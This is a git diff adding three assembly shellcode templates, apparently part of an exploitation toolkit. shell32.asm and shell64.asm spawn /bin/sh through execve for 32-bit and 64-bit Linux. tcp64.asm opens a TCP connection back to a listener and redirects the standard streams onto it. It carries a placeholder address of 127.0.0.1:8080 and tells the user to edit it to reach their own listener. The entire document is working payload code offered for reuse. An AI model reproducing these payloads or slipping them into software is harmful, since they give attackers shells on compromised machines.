diff options
Diffstat (limited to 'templates/shellcode/examples')
| -rw-r--r-- | templates/shellcode/examples/shell32.asm | 16 | ||||
| -rw-r--r-- | templates/shellcode/examples/shell64.asm | 24 | ||||
| -rw-r--r-- | templates/shellcode/examples/tcp64.asm | 49 |
3 files changed, 89 insertions, 0 deletions
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm new file mode 100644 index 0000000..6238469 --- /dev/null +++ b/templates/shellcode/examples/shell32.asm @@ -0,0 +1,16 @@ +; Originally based on https://www.exploit-db.com/shellcodes/46809 +; See shell64.asm for more details. + +; execve("/bin/sh", ["/bin/sh"], []) +xor eax, eax +xor ecx, ecx +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +mov al, 11 +int 0x80 diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm new file mode 100644 index 0000000..3812c33 --- /dev/null +++ b/templates/shellcode/examples/shell64.asm @@ -0,0 +1,24 @@ +; Originally based on https://www.exploit-db.com/shellcodes/47008 + +; stack layout +; +; ┏━━━━━━━━━━━━━━┓ +; ┃ v +; [ argv0, NULL ] "/bin//sh" NULL +; ^ ^ ^ +; ┃ ┃ ┃ +; argv envp filename + +; execve("/bin/sh", ["/bin/sh"], []) +xor rax, rax +xor rsi, rsi +mov rdi, 0x68732f2f6e69622f +push rsi +push rdi +mov rdi, rsp +push rsi +mov rdx, rsp +push rdi +mov rsi, rsp +mov al, 59 +syscall diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm new file mode 100644 index 0000000..1ec3bc8 --- /dev/null +++ b/templates/shellcode/examples/tcp64.asm @@ -0,0 +1,49 @@ +; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html + +; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +xor rax, rax +xor rdi, rdi +xor rsi, rsi +xor rdx, rdx +mov al, 41 +mov dil, 2 +mov sil, 1 +syscall + +; !! Edit this section to connect back to your listener !! +; +; struct sockaddr_in { // Struct size: 16 +; short int sin_family; // AF_INET (2) +; unsigned short int sin_port; // Set to 8080 below +; struct in_addr sin_addr; // Set to 127.0.0.1 below +; unsigned char sin_zero[8]; +; }; +; +; struct in_addr { // Struct size: 4 +; uint32_t s_addr; +; }; +xor rbx, rbx +push rbx +mov rbx, 0x0100007f901f0002 +push rbx + +; connect(fd, sockaddr, sizeof sockaddr) +mov rdi, rax +mov rsi, rsp +mov dl, 16 +xor rax, rax +mov al, 42 +syscall + +; dup2(fd, stdin) +; dup2(fd, stdout) +; dup2(fd, stderr) +xor rsi, rsi +mov al, 33 +syscall +mov sil, 1 +mov al, 33 +syscall +mov sil, 2 +mov al, 33 +syscall |